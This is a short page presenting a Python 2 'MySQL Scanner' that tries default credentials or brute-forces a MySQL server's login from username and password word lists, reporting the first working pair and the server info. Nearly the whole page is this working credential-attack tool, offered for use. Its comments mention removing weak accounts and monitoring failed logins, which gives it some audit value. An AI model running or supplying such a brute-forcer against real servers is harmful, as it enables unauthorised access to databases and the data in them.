Going up against MySQL

Tools for going against MySQL

MySQL Scanner

Here is a Python-based scanner that checks a MySQL server for default credentials, or uses a supplied username list and password list to brute-force the login.


import MySQLdb
import sys 

# Candidate usernames and passwords. Both start empty and are filled in by
# the main program from either the built-in defaults or the supplied files.
user_list, pass_list = [], []

def mysql_connect(u, p, ip):
    """Try a single MySQL login and print the outcome.

    u  -- username to try
    p  -- password to try
    ip -- host to connect to

    On success the credentials, host and server info string are printed,
    the connection is closed and the whole process exits with status 0, so
    the first working pair ends the scan.

    Any Exception raised during the attempt is reported as "Access denied".
    That includes failures that have nothing to do with authentication
    (for example the 5 second connect timeout expiring), so a "denied"
    line does not by itself show that the server rejected the password.
    """
    rule = "[+] ----------------------------------------"
    # Same keyword arguments as a direct MySQLdb.connect(...) call.
    settings = dict(user=u, passwd=p, host=ip, connect_timeout=5)
    try:
        print "[+] Attempting Connection..."
        conn = MySQLdb.connect(**settings)
        print "[+] Connection Successful!\n"
        print rule
        print "[+] Username: ", u, "  Password: ", p
        print "[+] IP: ", ip
        print "[+] Server Info: ", conn.get_server_info()
        print rule
        conn.close()
        print "[-] Connection Closed\n"
        # exit() raises SystemExit, which "except Exception" does not catch.
        exit(0)
    except Exception:
        print "Access denied\n"
        print u, " | ", p
        print ip

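# Begin main program
print ""
print "+--------------------+"
print "| MySQL Scanner v1.0 |"
print "| Written by Damian  |"
print "+--------------------+"

# The argument count selects the mode:
#   host only              -> built-in default credential list
#   host + two file paths  -> username list and password list from files
if len(sys.argv) == 2:
    print "[+] Setting up default credentials list\n"
    # An account that accepts any of these pairs (e.g. an empty password)
    # is the finding this mode reports; such accounts should be removed or
    # given a strong password.
    user_list = ["admin", "administrator", "root"]
    pass_list = ["password", "admin", "", "locked"]

elif len(sys.argv) == 4:
    print "[+] Building word list\n"
    # 'with' guarantees the file is closed. The original wrote `f.close`
    # without the call parentheses, so the username file was never closed.
    with open(sys.argv[2], 'r') as f:
        # Each line is appended as returned by readlines().
        user_list.extend(f.readlines())
    print "[+] Building password list\n"
    with open(sys.argv[3], 'r') as f:
        pass_list.extend(f.readlines())

else:
    print "\nUsage:"
    print "\tsql_scanner.py [host]"
    print "\tsql_scanner.py [host] [word_list] [password_list]\n"
    exit(0)

ip_address = str(sys.argv[1])

# Every username is paired with every password and tried in sequence against
# the one host. From the server's side this is a burst of failed logins
# from a single client address, which is what login-failure monitoring on
# the database host should be expected to pick up.
for x in user_list:
    for y in pass_list:
        mysql_connect(x, y, ip_address)

# Reached only when no pair succeeded: mysql_connect exits the process on
# the first successful login.
print "Scan Complete\n"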
Submitted by Damian